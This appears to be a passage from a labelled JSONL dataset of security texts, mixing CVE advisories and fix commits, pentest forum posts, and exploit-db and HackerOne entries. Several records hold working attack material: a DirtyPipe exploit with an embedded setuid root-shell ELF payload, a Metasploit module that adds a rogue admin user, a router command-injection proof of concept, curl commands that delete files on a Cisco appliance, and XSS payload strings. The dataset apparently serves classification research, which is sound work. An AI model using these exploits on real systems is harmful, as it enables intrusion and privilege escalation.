releases.\n\nhttps://rubyonrails.org/2023/1/17/Rails-Versions-6-0-6-1-6-1-7-1-7-0-4-1-have-been-released", "source": "github_advisory", "timestamp": "2023-01-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e818c1ecc57145898ba9", "text": "Craft CMS XSS Vulnerability\n\n[Severity: MEDIUM]\n\nCraft CMS before 2.6.2976 allows XSS attacks because an array returned by HttpRequestService::getSegments() and getActionSegments() need not be zero-based. NOTE: this vulnerability exists because of an incomplete fix for CVE-2017-8052.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f03c05a6bc4b812365bb", "text": "Although this question is not associated with Parrot Security , you may use voicechanger.io , voicemod.net and other apps on both App and Play Store .", "source": "parrotsec", "timestamp": "2022-03-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "54b2f5b53037e90da20f", "text": "Learning paths on reputable services are a good way. want more guidance? Start with tryhackme.com want a little less guidance and more self-sufficiency? Academy.hackthebox.com is a place to go. want to learn using the “sink or swim” method? Overthewire.org awaits you.", "source": "parrotsec", "timestamp": "2022-04-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bbd33bb0dd020901e3a6", "text": "Supplementary details: Observe each parameter mentioned in “ Login Form Attacks” in combination with “ Login Form Attacks”… (At least that’s how I passed…Mentality will affect thinking, so please be patient!)", "source": "hackthebox", "timestamp": "2022-04-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "37344bf57a7bca7ad3fa", "text": "CVE: CVE-2022-29203\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.SpaceToBatchND` (in all backends such as XLA and handwritten kernels) is vulnerable to an integer overflow: The result of this integer overflow is used to allocate the output tensor, hence we get a denial of service via a `CHECK`-failure (assertion failure), as in TFSA-2021-198. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix security vulnerability with SpaceToBatchNDOp.\n\nPiperOrigin-RevId: 445527615", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9d31ca5a6f648dbbf7a9", "text": "CVE: CVE-2022-27815\n\n[{'lang': 'en', 'value': 'SWHKD 1.1.5 unsafely uses the /tmp/swhkd.pid pathname. There can be an information leak or denial of service.'}]\n\nFix commit: [patch] CVE-2022-27815", "source": "cvefixes", "timestamp": "2022-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ccddd70acf979640ce8c", "text": "can you help me in the digging in part and going depper part", "source": "hackthebox", "timestamp": "2023-02-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e2c8f831b65b2ce2aa27", "text": "Hi @SwordFish Have you tried installing linux-perf? sudo apt install linux-perf There appears to be two versions based on Linux kernel version (i.e. linux-perf_5.10.162-1 , linux-perf_6.0.12-1parrot1_amd64.deb )", "source": "parrotsec", "timestamp": "2023-02-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e1ee7e0fb365f5f332cf", "text": "A journal to detect hidden processes on Linux\n\nOpen process blah blah… rootkit and hidden processes blah blah… Skipped to the point: There are some mechanics to detect hidden processes on Linux system. 1 of them is checking procfs . Technical information: You can’t see the process information when use ps You can’t see procfs folder when do ls /proc/ You CAN cd procfs and read data inside the folder because it’s available This method is easy to program (it took me 1 hour to create a script. I spent 30 mins to detect a bug that i defined wrong value for a variable). There are some projects can do that: unhide : written in C (mostly?), available on repository. Do sudo apt install unhide A project written in Golang, article about it Linux Stealth Rootkit Process Decloaking Tool – sandfly-processdecloak . Link to source code: GitHub - sandflysecurity/sandfly-processdecloak: Sandfly Linux Stealth Rootkit Decloaking Utility Testing with Diamorphine rootkit Some basic commands to use this rootkit Expose hiding processes - Learning Wazuh · Wazuh documentation Rootkit source code (compiled okay on Parrot with kernel 6.0): GitHub - m0nad/Diamorphine: LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64) Skipped the build and infect system step The test process is 1161 which is mate-terminal . We can see the process in both ps and ls /proc/ | grep 1161 image 814×299 65 KB Tell rootkit to hide the process, system can’t see it image 809×238 72.2 KB However, listing directory is fine image 744×316 88.1 KB Run simple check with the sandfly-processdecloak , it took about 16 sec to do complete check. image 665×298 80.5 KB Test with unhide-linux . Problems: It requires root permission (dont trust this screenshot. I told the rootkit to give current user root permission) False positive High CPU usage. The whole system was laggy when it ran Slow (it took 21 secs) image 704×490 87.1 KB image 756×493 89.4 KB My tool, which is ported (I stole the code) of processuncloak src/tools/unhide_procs.nim · main · Nong Hoang Tu / rkcheck · GitLab Downloaded script inside VM (name’s test) It took < 5 secs to complete check. The whole source code has 64 lines and very easy to read (my code syntax is bad though)", "source": "parrotsec", "timestamp": "2022-11-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "59229a6063bfd96dd2de", "text": "Linksys AX3200 V1.1.00 - Command Injection\n\n# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection\n# Date: 2022-09-19\n# Exploit Author: Ahmed Alroky\n# Author: Linksys\n# Version: 1.1.00\n# Authentication Required: YES\n# CVE : CVE-2022-38841\n\n# Tested on: Windows\n\n# Proof Of Concept:\n\n1 - login into AX3200 webui\n2 - go to diagnostics page\n3 - put \"google.com|ls\" to perform a traceroute\n4 - you will get the file list and also you can try \"example.com|id\" to ensure that all commands executed as a root user", "source": "exploitdb", "timestamp": "2023-03-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b8f758d378ffeba35df6", "text": "Hi @Famous_Hacker you can learn and test skills on https://academy.hackthebox.com/ (very interactive learning) also check google crash courses…", "source": "parrotsec", "timestamp": "2022-03-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "852928a4a7052aab885d", "text": "baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability \n\n[Severity: MEDIUM]\n\nThere is a cross-site scripting vulnerability on the management system of baserCMS.\n\nThis is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.\nIf you are eligible, please update to the new version as soon as possible.\n\n### Target\nbaserCMS 4.7.1 and earlier versions.\n\n### Vulnerability\nExecution of malicious JavaScript code may alter the display of the page or leak cookie information.\n- In Favorite registration (CVE-2022-39325)\n- In Permission Settings (CVE-2022-41994)\n- In User group management (CVE-2022-42486)\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\n### Credits\n- Shogo Iyota@Mitsui Bussan Secure Directions, Inc.\n- YUYA KOTAKE@CARTA HOLDINGS, INC.", "source": "github_advisory", "timestamp": "2022-11-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fed4cb870b5dad1bec2c", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-0979, CVE-2018-0980, CVE-2018-0990, CVE-2018-0993, CVE-2018-0994, CVE-2018-0995.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "da9bde3ee3c0aadfe87c", "text": "Could someone please give me a nudge on bypass authentication? I’ve tried everything I know, and all sorts of tools… Edit: NVM I got it", "source": "hackthebox", "timestamp": "2023-09-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d22c4ce6df0ec1f83e7f", "text": "I was beating my head against the wall with this challenge and trying desperately not to over think it. This single line right here helped me so much because I wasn’t seeing what I expected through gdb. Thank you! 5- remember when you are inside gdb and run \" $(python -c blablabla)\" it’s the same as executing the script with the parameter, as follows: ‘./script $(python -c blablabla)’ I will also note, this chapter shows you one way of using msfvenom with its build up to the challenge. There are many tools in msfvenom’s tool suite!", "source": "hackthebox", "timestamp": "2023-01-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "cb191eeef4e2a322b0f4", "text": "CVE: CVE-2022-24750\n\n[{'lang': 'en', 'value': 'UltraVNC is a free and open source remote pc access software. A vulnerability has been found in versions prior to 1.3.8.0 in which the DSM plugin module, which allows a local authenticated user to achieve local privilege escalation (LPE) on a vulnerable system. The vulnerability has been fixed to allow loading of plugins from the installed directory. Affected users should upgrade their UltraVNC to 1.3.8.0. Users unable to upgrade should not install and run UltraVNC server as a service. It is advisable to create a scheduled task on a low privilege account to launch WinVNC.exe instead. There are no known workarounds if wincnc needs to be started as a service.'}]\n\nFix commit: security fix", "source": "cvefixes", "timestamp": "2022-03-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "954093f4ad0121ae4429", "text": "CVE: CVE-2022-29859\n\n[{'lang': 'en', 'value': 'component/common/network/dhcp/dhcps.c in ambiot amb1_sdk (aka SDK for Ameba1) before 2022-03-11 mishandles data structures for DHCP packet data.'}]\n\nFix commit: [dhcps] update dhcps", "source": "cvefixes", "timestamp": "2022-04-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "53c0a206d3581b3805a1", "text": "Upgrading doesn't prevent exploiting vulnerable XWiki documents\n\n[Severity: CRITICAL]\n\n### Impact\n\nWhen an XWiki installation is upgraded and that upgrade contains a fix for a bug in a document, just a new version of that document is added. In some cases, it's still possible to exploit the vulnerability that was fixed in the new version. The severity of this depends on the fixed vulnerability, for the purpose of this advisory take [CVE-2022-36100](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2g5c-228j-p52x) as example - it is easily exploitable with just view rights and critical. When XWiki is upgraded from a version before the fix for it (e.g., 14.3) to a version including the fix (e.g., 14.4), the vulnerability can still be reproduced by adding `rev=1.1` to the URL used in the reproduction steps so remote code execution is possible even after upgrading. Therefore, this affects the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability also affects manually added script macros that contained security vulnerabilities that were later fixed by changing the script macro without deleting the versions with the security vulnerability from the history.\n\nThis vulnerability doesn't affect freshly installed versions of XWiki. Further, this vulnerability doesn't affect content that is only loaded from the current version of a document like the code of wiki macros or UI extensions.\n\n### Patches\n\nThis vulnerability has been patched in XWiki 14.10.7 and 15.2RC1 by forcing old revisions to be executed in a restricted mode that disables all script macros.\n\n### Workarounds\n\nAs a workaround, admins can manually delete old revisions of affected documents. A script could be used to identify all installed documents and delete the history for them. However, also manually added and later corrected code may be affected by this vulnerability so it is easy to miss documents.\n\n### References\n\n* https://jira.xwiki.org/browse/XWIKI-20594\n* https://github.com/xwiki/xwiki-platform/commit/15a6f845d8206b0ae97f37aa092ca43d4f9d6e59", "source": "github_advisory", "timestamp": "2023-06-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "af057325fdda54ee8957", "text": "from here you can get the idea d-tech-educate this site will help you to solve the issue", "source": "go4expert", "timestamp": "2023-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1f922115ac5955f94601", "text": "Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)\n\n// Exploit Title: Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)\n// Exploit Author: blasty (peter@haxx.in)\n// Original Author: Max Kellermann (max.kellermann@ionos.com)\n// CVE: CVE-2022-0847\n\n/* SPDX-License-Identifier: GPL-2.0 */\n/*\n * Copyright 2022 CM4all GmbH / IONOS SE\n *\n * author: Max Kellermann \n *\n * Proof-of-concept exploit for the Dirty Pipe\n * vulnerability (CVE-2022-0847) caused by an uninitialized\n * \"pipe_buffer.flags\" variable. It demonstrates how to overwrite any\n * file contents in the page cache, even if the file is not permitted\n * to be written, immutable or on a read-only mount.\n *\n * This exploit requires Linux 5.8 or later; the code path was made\n * reachable by commit f6dd975583bd (\"pipe: merge\n * anon_pipe_buf*_ops\"). The commit did not introduce the bug, it was\n * there before, it just provided an easy way to exploit it.\n *\n * There are two major limitations of this exploit: the offset cannot\n * be on a page boundary (it needs to write one byte before the offset\n * to add a reference to this page to the pipe), and the write cannot\n * cross a page boundary.\n *\n * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\\nssh-ed25519 AAA......\\n'\n *\n * Further explanation: https://dirtypipe.cm4all.com/\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef PAGE_SIZE\n#define PAGE_SIZE 4096\n#endif\n\n// small (linux x86_64) ELF file matroshka doll that does;\n// fd = open(\"/tmp/sh\", O_WRONLY | O_CREAT | O_TRUNC);\n// write(fd, elfcode, elfcode_len)\n// chmod(\"/tmp/sh\", 04755)\n// close(fd);\n// exit(0);\n//\n// the dropped ELF simply does:\n// setuid(0);\n// setgid(0);\n// execve(\"/bin/sh\", [\"/bin/sh\", NULL], [NULL]);\nunsigned char elfcode[] = {\n\t/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\n\t0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,\n\t0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,\n\t0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,\n\t0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,\n\t0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,\n\t0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,\n\t0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,\n\t0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,\n\t0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,\n\t0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,\n\t0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,\n\t0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,\n\t0x00, 0x00, 0x", "source": "exploitdb", "timestamp": "2022-03-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4fbbe62ff32af62df370", "text": "Guys, does anybody know why “character shifting” technique for “&” doesn’t work here? It accepts %26, but $(tr%09’!-}‘%09’\"-~'<<<%) results in an error.", "source": "hackthebox", "timestamp": "2023-04-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ff5f384b2df36e0d3296", "text": "Parrot Devs will never call you, be aware of pfishers and snoopers\n\nIf there is a number associated to your mail, they have your telephone number. Apparently this site show your email as well or is badly protected. Never answer an unknown caller with the mail associated here. In contrast you can use a telephone number to attract potential attackers and use WireShark logs.", "source": "parrotsec", "timestamp": "2023-11-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f110638667d61ff37968", "text": "So I ran the shell code and got something back, but it’s not the right answer, even though it looks like the right answer given the ‘format’. Can someone who figured this out PM me so I can confirm if I’ve got the right output? If not can you tell me how to get the right output?", "source": "hackthebox", "timestamp": "2022-11-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "492233178f8bcc06025a", "text": "Servisnet Tessa - Privilege Escalation (Metasploit)\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Servisnet Tessa - Privilege Escalation (Metasploit)',\n 'Description' => %q(\n This module exploits privilege escalation in Servisnet Tessa, triggered by add new sysadmin user with any user authorization .\n\t\tAn API request to \"/data-service/users/[userid]\" with any low-authority user returns other users' information in response.\n The encrypted password information is included here, but privilage escelation is possible with the active sessionid value.\n\n var token = Buffer.from(`${user.username}:${user.usersessionid}`, 'utf8').toString('base64');\n\n The logic required for the Authorization header is as above.\n Therefore, after accessing an authorized user ID value and active sessionId value,\n if the username and sessionId values are encoded with base64, a valid Token will be obtained and a new admin user can be added.\n\n ),\n 'References' =>\n [\n [ 'CVE', 'CVE-2022-22832' ],\n [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Privilege-Escalation.html' ],\n [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]\n ],\n 'Author' =>\n [\n 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Dec 22 2021\",\n 'DefaultOptions' =>\n {\n 'RPORT' => 443,\n 'SSL' => true\n }\n ))\n\n register_options([\n\tOptString.new('USERNAME', [true, 'Servisnet Username']),\n OptString.new('PASSWORD', [true, 'Servisnet Password']),\n OptString.new('TARGETURI', [true, 'Base path for application', '/'])\n ])\n end\n # split strings to salt\n def split(data, string_to_split)\n word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n string = word.split('\"]').join('').split('[\"').join('')\n return string\n end\n # split JSONs to salt\n def splitJSON(data, string_to_split)\n word = data.scan(/\"#{string_to_split}\":\"([\\S\\s]*?)\"/)\n string = word.split('\"]').join('').split('[\"').join('')\n return string\n end\n # split JSONs to salt none \"\n def splitJSON2(data, string_to_split)\n word = data.scan(/\"#{string_to_split}\":([\\S\\s]*?),/)[0]\n string = word.split('\"]').join('').split('[\"').join('')\n return string\n end\n\n def app_path\n res = send_request_cgi({\n # default.a.get( check\n 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),\n\t 'method' => 'GET'\n })\n\n if res && res.code == 200 && res.body =~ /baseURL/\n data = res.body\n #word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n base_url = data.scan(/baseURL: '\\/([\\S\\s]*?)'/)[0]\n return base_url\n else\n fail_with(Failure::NotVulnerable, 'baseURL not found!')\n end\n end\n\n def add_user(token, app_path)\n newuser = Rex::Text.rand_text_alpha_lower(8)\n id = Rex::Text.rand_text_numeric(4)\n # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111\n json_data = '{\"alarm_request\": 1, \"city_id\": null, \"city_name\": null, \"decryptPassword\": null, \"email\": \"' + newuser + '@localhost.local\", \"id\": ' + id + ', \"invisible\": 0, \"isactive\": 1, \"isblocked\": 0, \"levelstatus\": 1, \"local_authorization\": 1, \"mail_request\": 1, \"name\": \"' + newuser + '\", \"password\": \"hxZ8I33nmy9PZNhYhms/Dg==\", \"phone\": null, \"position\": null, \"region_name\": \"test4\", \"regional_id\": 0, \"role_id\": 1, \"role_name\": \"Sistem Admin\", \"rolelevel\": 3, \"status\": null, \"surname\": \"' + newuser + '\", \"totalRecords\": null, \"try_pass_right\": 0, \"userip\": null, \"username\": \"' + newuser + '\", \"userType\": \"Lokal Kullanıcı\"}'\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n ", "source": "exploitdb", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "34682a4c9281637984aa", "text": "CVE: CVE-2022-21710\n\n[{'lang': 'en', 'value': 'ShortDescription is a MediaWiki extension that provides local short description support. A cross-site scripting (XSS) vulnerability exists in versions prior to 2.3.4. On a wiki that has the ShortDescription enabled, XSS can be triggered on any page or the page with the action=info parameter, which displays the shortdesc property. This is achieved using the wikitext `{{SHORTDESC:<img src=x onerror=alert()>}}`. This issue has a patch in version 2.3.4.'}]\n\nFix commit: build: bump version to 2.3.4", "source": "cvefixes", "timestamp": "2022-01-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a7735d47190460fd9f16", "text": "Hauutiwwx: Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box Oh no you didnt Im sort of frustrated, as the guidelines are very clear. Upload without RDPing. RDP after you uploaded.", "source": "hackthebox", "timestamp": "2022-05-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "44ae751d6e321760b3ae", "text": "CVE: CVE-2022-34134\n\n[{'lang': 'en', 'value': 'Benjamin BALET Jorani v1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /application/controllers/Users.php.'}]\n\nFix commit: BF:security on users mgt with CSRF token fix #369", "source": "cvefixes", "timestamp": "2022-06-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1a66fb0c39d2e49e6ded", "text": "i just logged to say Thank You for this! Every learn path looks great and actually i start with MA, lucky that i back here for a while! I hope project will survive and grow. OST2 is related somehow to Parrot OS? or it’s just learning source you recommend? Happy New Year btw. and good luck with your rkcheck project!", "source": "parrotsec", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "99dbd4d8d9d5c440ba54", "text": "Other than controlling the drone via keyboard, not much. I’ve been stuck on decoding the video for weeks haha. Seems like the App is using Ffmpeg, AVPlayer, EglView, Opencv, CNN, and etc. Idk if it’s helping. I’ve read many articles about “hacking” bunch of drone. And their way of accesing the video stream so simple. Idk why it’s hard in this case haha. I thought that the drone is encapsulating the stream using something like RTP but after testing, the packet send using RTP doesn’t match what the drone have sent. Now i’m stuck. Still researching sending video over udp tho, will reply when i’ve found the solution.", "source": "hackthebox", "timestamp": "2023-11-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "736c5e458cf51b4097f9", "text": "CVE: CVE-2022-2128\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in GitHub repository polonel/trudesk prior to 1.2.4.'}]\n\nFix commit: fix(attachments): file type security fix", "source": "cvefixes", "timestamp": "2022-06-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0901dc0853491ab78033", "text": "CVE: CVE-2022-1553\n\n[{'lang': 'en', 'value': 'Leaking password protected articles content due to improper access control in GitHub repository publify/publify prior to 9.2.8. Attackers can leverage this vulnerability to view the contents of any password-protected article present on the publify website, compromising confidentiality and integrity of users.'}]\n\nFix commit: Do not create article meta description for password-protected articles", "source": "cvefixes", "timestamp": "2022-05-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f69d9ea1de9a44b029b6", "text": "Its a funny answer, but the way I found it was \" Get-Alias | findstr ipconfig \" Answer: ifconfig", "source": "hackthebox", "timestamp": "2022-08-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f29e2b1879677fd5c0a3", "text": "i was in the same situation, try to read /etc/passwd/ properly, the name is there", "source": "hackthebox", "timestamp": "2022-05-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "267ea1f98f24d5ad35c2", "text": "Symfony Denial of Service Via Long Password Hashing\n\n[Severity: MEDIUM]\n\nThe Security component in Symfony 2.0.x before 2.0.25, 2.1.x before 2.1.13, 2.2.x before 2.2.9, and 2.3.x before 2.3.6 allows remote attackers to cause a denial of service (CPU consumption) via a long password that triggers an expensive hash computation, as demonstrated by a PBKDF2 computation, a similar issue to CVE-2013-5750.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c43f528da94ad425fb6d", "text": "CVE: CVE-2022-0351\n\n[{'lang': 'en', 'value': 'Access of Memory Location Before Start of Buffer in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4206: condition with many \"(\" causes a crash\n\nProblem: Condition with many \"(\" causes a crash.\nSolution: Limit recursion to 1000.", "source": "cvefixes", "timestamp": "2022-01-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "31ec00bb4f907cdc00c6", "text": "For those who have been like me and have been stuck on this question for ages, not being able to get the correct password list to use here are some clues, hopefully these are helpful: The brute forcing should not take long at all You only need to input the characters first name into the password generator (cupp) Try ticking the option to using special characters at the end of words Use Leet mode Dont forget to filter the password list for passwords that match the password policy Hopefully this help", "source": "hackthebox", "timestamp": "2022-01-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ed21e03111886410da20", "text": "Android 8 devices and onwards this is quite expected. That ‘attack’ only works on Android 7 or earlier from memory, for a ‘proof of concept’ you can run an Android VM on virtual box or vmware etc, the earlier vulnerable Android version, and then see the exploit in action.", "source": "parrotsec", "timestamp": "2023-03-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b5679a1920e087dac4fc", "text": "I figured it out) Brought it to full screen and saw an icon in the lower right corner. It was not displayed in normal mode.( HTB Academy 277×174 38.6 KB That’s just through pwnbox, the error is the same as on my VM, unfortunately. What am I doing wrong? The advice was to run the script on pwnbox. strangely error_HTB Academy 758×387 143 KB", "source": "hackthebox", "timestamp": "2022-06-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "64423f066434566b83b9", "text": "[Path Traversal] CVE-2020-3187 - Unauthenticated Arbitrary File Deletion\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences.\n\nThe IP has a SSL certificate pointing to .█████\ncurl -kv https://█████████/\n\noutput\n```\nServer certificate:\n* subject: █████████.mil\n```\n\n## Impact\n\nAn exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system. This file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability can not be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Reloading the affected device will restore all files within the web services file system.\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3187\n\n## Steps to Reproduce\n1.First I performed a curl request to validate that /session_password.html gave a 200 response.\ncurl -k -s -i https://███/+CSCOE+/session_password.html\n2.Example to delete logo file \"/+CSCOU+/csco_logo.gif\".\ncurl -k -H \"Cookie: token=../+CSCOU+/csco_logo.gif\" https://██████/+CSCOE+/session_password.html\n\n_NOTE: No destructive behavior was performed on target, the above command will remove csco_logo.gif and can be restored on reboot of the device_\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43", "source": "hackerone", "timestamp": "2022-05-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c736a15d82e9ff55e3e0", "text": "Thanks @htbperson The 3rd point is where all of us get stuck. Be sure to make the ipaddress the ip address of “tun0” not anything else.", "source": "hackthebox", "timestamp": "2023-12-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c7a8804410135c667328", "text": "CVE: CVE-2022-2862\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 9.0.0221.'}]\n\nFix commit: patch 9.0.0221: accessing freed memory if compiling nested function fails\n\nProblem: Accessing freed memory if compiling nested function fails.\nSolution: Mess up the variable name so that it won't be 